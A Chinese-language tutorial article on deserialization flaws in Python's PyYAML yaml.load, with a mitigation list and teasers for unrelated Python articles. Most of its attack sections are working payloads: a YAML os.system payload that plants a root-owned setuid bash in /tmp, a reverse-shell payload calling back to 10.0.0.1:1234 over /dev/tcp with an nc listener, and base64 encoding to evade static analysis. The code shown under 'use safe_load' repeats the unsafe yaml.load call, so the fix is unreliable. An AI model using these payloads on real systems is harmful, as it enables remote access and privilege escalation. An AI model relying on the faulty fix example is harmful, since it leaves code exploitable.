在 Python 中使用 YAML 時要小心！可能存在安全漏洞-Python教學-PHP中文網

首頁

後端開發

Python教學

在 Python 中使用 YAML 時要小心！可能存在安全漏洞

Patricia Arquette

Jan 03, 2025 pm 10:15 PM

Be Careful When Using YAML in Python! There May Be Security Vulnerabilities

Python 中的 YAML（YAML 不是標記語言）函式庫已被確定存在允許在特定條件下執行任意命令的漏洞。此漏洞是由於使用 yaml.load 函數而未指定安全性載入程式而引起的。預設情況下，yaml.load 可以執行任意 Python 對象，這為惡意負載創建了攻擊面。

透過任意指令執行進行利用

根本風險在於反序列化過程。當 YAML 文件包含惡意負載時，yaml.load 會處理嵌入的指令，可能導致程式碼執行。例如，考慮以下程式碼片段：

import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage

這裡，yaml.load 函數不受限制地解析 example.yml，如果 YAML 內容包含不安全指令，則該函數很容易受到攻擊。典型的漏洞利用負載可以被設計來執行任意系統指令。

有效負載範例

import yaml
from yaml import Loader, UnsafeLoader

# Malicious payload
payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]'

# Exploitation
yaml.load(payload)
yaml.load(payload, Loader=Loader)
yaml.load(payload, Loader=UnsafeLoader)

每個呼叫都會處理有效負載，從而在 /tmp/bash 中建立特權可執行檔。然後可以使用提升的權限執行該二進位檔案：

/tmp/bash -p

這表明，如果在權限配置錯誤或存在其他弱點的系統上利用該漏洞，則可能會出現權限提升的可能性。

反向 Shell 攻擊

一個特別陰險的用例是利用該漏洞進行反向 shell。這使得攻擊者能夠遠端存取目標電腦。該過程涉及在攻擊者的電腦上啟動偵聽器並製作旨在建立反向連接的 YAML 文件。

在攻擊者的機器上，啟動 Netcat 監聽器：

nc -lvnp 1234

在目標系統上，以 root 身分執行以下 Python 腳本：

import yaml

# Reverse shell payload
data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]'
yaml.load(data)  # Executes the reverse shell

此有效負載指示目標電腦連接回攻擊者的偵聽器，提供具有執行程序權限的完全互動式 shell。

用於混淆的 Base64 編碼

要繞過基本的安全控製或過濾器，有效負載可以進行 Base64 編碼。此方法增加了一層混淆，可能會逃避靜態分析工具的偵測。

例子

from base64 import b64decode
import yaml

# Base64-encoded payload
encoded_payload = b"ISFweXRa...YXNoIl0="  # Truncated for brevity
payload = b64decode(encoded_payload)

# Execute the payload
yaml.load(payload)

緩解技術

專業人員必須採用嚴格的編碼實務來消除此類漏洞。建議的緩解措施包括：

使用安全性載入器：將 yaml.load 替換為 yaml.safe_load，這樣可以防止執行任意物件。
```
import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage
```
限制輸入來源：確保 YAML 輸入經過淨化並且僅來自可信來源。
應用靜態分析：使用工具掃描程式碼庫是否有不安全的 yaml.load 呼叫。
環境強化：限制系統權限以最大程度地減少利用的影響。例如，使用容器化環境限制了攻擊者提升權限的能力。

YAML 函式庫的預設行為體現了與 Python 等動態類型語言中的反序列化相關的風險。利用此漏洞所需的複雜程度極低，因此它成為安全應用程式開發的高優先級問題。採用安全的編碼實踐以及強大的輸入驗證和運行時保護措施對於有效減輕這些風險至關重要。

以上是在 Python 中使用 YAML 時要小心！可能存在安全漏洞的詳細內容。更多資訊請關注PHP中文網其他相關文章！

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

學習Python：2小時的每日學習是否足夠？Apr 18, 2025 am 12:22 AM

每天學習Python兩個小時是否足夠？這取決於你的目標和學習方法。 1)制定清晰的學習計劃，2)選擇合適的學習資源和方法，3)動手實踐和復習鞏固，可以在這段時間內逐步掌握Python的基本知識和高級功能。

Web開發的Python：關鍵應用程序Apr 18, 2025 am 12:20 AM

Python在Web開發中的關鍵應用包括使用Django和Flask框架、API開發、數據分析與可視化、機器學習與AI、以及性能優化。 1.Django和Flask框架：Django適合快速開發複雜應用，Flask適用於小型或高度自定義項目。 2.API開發：使用Flask或DjangoRESTFramework構建RESTfulAPI。 3.數據分析與可視化：利用Python處理數據並通過Web界面展示。 4.機器學習與AI：Python用於構建智能Web應用。 5.性能優化：通過異步編程、緩存和代碼優

Python vs.C：探索性能和效率Apr 18, 2025 am 12:20 AM

Python在開發效率上優於C ，但C 在執行性能上更高。 1.Python的簡潔語法和豐富庫提高開發效率。 2.C 的編譯型特性和硬件控制提升執行性能。選擇時需根據項目需求權衡開發速度與執行效率。

python在行動中：現實世界中的例子Apr 18, 2025 am 12:18 AM

Python在現實世界中的應用包括數據分析、Web開發、人工智能和自動化。 1)在數據分析中，Python使用Pandas和Matplotlib處理和可視化數據。 2)Web開發中，Django和Flask框架簡化了Web應用的創建。 3)人工智能領域，TensorFlow和PyTorch用於構建和訓練模型。 4)自動化方面，Python腳本可用於復製文件等任務。